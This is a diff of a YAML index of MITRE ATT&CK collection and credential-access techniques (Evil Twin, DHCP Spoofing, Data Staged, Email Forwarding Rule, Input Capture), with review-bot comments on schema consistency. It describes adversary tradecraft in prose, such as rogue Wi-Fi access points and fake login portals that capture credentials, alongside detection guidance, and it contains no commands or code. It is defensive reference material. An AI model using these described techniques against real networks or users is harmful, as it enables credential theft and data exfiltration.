- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Remote Data Staging
description: |-
Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -40019,23 +40478,47 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Creation'
- 'Command: Command Execution'
- 'File: File Access'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+ created: '2020-03-13T21:14:58.206Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/002
+ external_id: T1074.002
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:54:39.466Z'
name: Data from Local System
description: |
Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
@@ -40105,7 +40588,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1005
atomic_tests: []
T1560.002:
@@ -40140,7 +40622,7 @@ collection:
description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
April 22, 2016.
source_name: Wikipedia File Header Signatures
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T18:27:30.891Z'
name: 'Archive Collected Data: Archive via Library'
description: |-
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -40159,10 +40641,89 @@ collection:
x_mitre_data_sources:
- 'Script: Script Execution'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1560.002
atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1602.002:
technique:
x_mitre_platforms:
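Review bot: The new T1557.004 (Evil Twin) entry ships with `x_mitre_detection: ''`, so tooling that checks for the presence of the key rather than its content will report detection guidance where there is none; either omit the key when upstream has no text, or treat the empty string as "no guidance" in whatever produces coverage reports, leaving the listed `'Network Traffic: Network Traffic Content'` and `'Network Traffic: Network Traffic Flow'` data sources as the only detection hooks for now. Two smaller points: the entry has no `identifier:` line although the sibling T1560.002 directly above (`identifier: T1560.002`) and T1074.001, T1114.001, T1119, T1115, T1530 and T1005 carry one, while T1074.002, T1602.002 and T1185 do not, so whichever shape is the intended schema should be applied consistently; and the description contains the upstream wording "the adversary may able to monitor", which should be reported upstream rather than patched in the generated copy.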
@@ -40191,7 +40752,7 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
by Cyber Actors. Retrieved October 2, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-17T19:50:46.948Z'
name: Network Device Configuration Dump
description: "Adversaries may access network configuration files to collect
sensitive data about the device and the network. The network configuration
@@ -40221,8 +40782,6 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1560:
technique:
@@ -40276,7 +40835,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560
atomic_tests: []
T1185:
@@ -40313,7 +40871,7 @@ collection:
description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
Retrieved May 24, 2017.
source_name: cobaltstrike manual
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-25T18:58:15.229Z'
name: Browser Session Hijacking
description: |-
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -40341,12 +40899,10 @@ collection:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -40383,23 +40939,23 @@ collection:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -40432,21 +40988,20 @@ collection:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
@@ -40554,12 +41109,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -40570,13 +41124,13 @@ collection:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -40590,6 +41144,7 @@ collection:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -40600,12 +41155,12 @@ collection:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1125:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.205Z'
name: Video Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -40650,30 +41205,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1125
atomic_tests: []
T1213.001:
technique:
- x_mitre_platforms:
- - SaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
- type: attack-pattern
- created: '2020-02-14T13:09:51.004Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.001
- url: https://attack.mitre.org/techniques/T1213/001
- - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
- description: Atlassian. (2018, January 9). How to Enable User Access Logging.
- Retrieved April 4, 2018.
- source_name: Atlassian Confluence Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-30T13:45:42.840Z'
name: Confluence
description: |2
@@ -40683,31 +41219,48 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+ created: '2020-02-14T13:09:51.004Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/001
+ external_id: T1213.001
+ - source_name: Atlassian Confluence Logging
+ description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+ Retrieved April 4, 2018.
+ url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1114.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Email Forwarding Rule'
description: "Adversaries may setup email forwarding rules to collect sensitive
information. Adversaries may abuse email forwarding rules to monitor the activities
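Review bot: This hunk silently drops `x_mitre_permissions_required: - User` from T1213.001, while T1114.001 (same `- User` value, earlier in this diff) and T1602.002 (`- Administrator`) keep the field; if the field is being retired it should go everywhere in one pass, and if upstream removed it only for this object the PR description should say so. The description edit that links testing/development credentials to T1552 is consistent with the `x_mitre_version` bump from `'1.0'` to `'1.1'`, and the reordering of `external_references` (URL now last) matches the other regenerated objects.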
@@ -40740,10 +41293,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Security
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- Liran Ravich, CardinalOps
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -40752,16 +41307,17 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
+ - 'Cloud Service: Cloud Service Metadata'
type: attack-pattern
id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
created: '2020-02-19T18:54:47.103Z'
@@ -40793,9 +41349,6 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.003
atomic_tests:
- name: Office365 - Email Forwarding
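Review bot: T1114.003 is the one object in this region with a real atomic test (`- name: Office365 - Email Forwarding`), and its platform list has just lost `Office 365` in favour of `Office Suite`; the test's own `supported_platforms` is outside this diff, so please confirm it was updated in the same change, otherwise a per-platform index built for the consolidated platform will omit this test while the technique claims `Office Suite`. The added `'Cloud Service: Cloud Service Metadata'` data source fits the detection text, which already points at message tracking logs and rule property values rather than host telemetry.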
@@ -40848,63 +41401,62 @@ collection:
elevation_required: false
T1074:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Shane Tully, @securitygypsy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
- created: '2017-05-31T21:30:58.938Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1074
- url: https://attack.mitre.org/techniques/T1074
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: PWC Cloud Hopper April 2017
- url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
- description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
- April 5, 2017.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Data Staged
description: |-
Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data Staged
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ - Shane Tully, @securitygypsy
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'File: File Access'
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+ created: '2017-05-31T21:30:58.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074
+ external_id: T1074
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: PWC Cloud Hopper April 2017
+ description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+ April 5, 2017.
+ url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
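Review bot: the T1074 entry goes straight from `x_mitre_modified_by_ref` to `atomic_tests: []` with no `identifier` key, while the T1056.002 and T1039 entries in the next two hunks carry `identifier: T1056.002` and `identifier: T1039` immediately before their `atomic_tests`. This hunk only removes `spec_version: '2.1'` and reorders keys, so it does not introduce the gap, but if `identifier` is meant to be emitted per entry, whatever regenerates this index should emit it for every technique; if it is intentionally present only for some entries, say which in the generator or the PR description so readers of the index do not rely on it.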
@@ -40977,7 +41529,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1039:
@@ -41032,12 +41583,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1039
atomic_tests: []
T1114.002:
technique:
- modified: '2023-05-31T12:34:03.420Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Remote Email Collection'
description: Adversaries may target an Exchange server, Office 365, or Google
Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -41049,6 +41599,9 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
locations, especially for privileged accounts (ex: Exchange administrator
@@ -41056,11 +41609,11 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
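Review bot: the platform list for T1114.002 replaces `Office 365` and `Google Workspace` with the single value `Office Suite` (with `x_mitre_version` bumped from 1.2 to 1.3), and the T1213 hunk further down makes the same substitution. Any index that is keyed by platform name will now need an `Office Suite` variant, and outputs still keyed on `Office 365` or `Google Workspace` will silently stop listing these techniques, so check that the per-platform index files are regenerated together with this YAML rather than left with stale membership.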
@@ -41077,9 +41630,6 @@ collection:
external_id: T1114.002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.002
atomic_tests:
- name: Office365 - Remote Mail Collected
@@ -41174,7 +41724,7 @@ collection:
elevation_required: false
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -41190,6 +41740,7 @@ collection:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -41198,13 +41749,13 @@ collection:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -41212,15 +41763,11 @@ collection:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
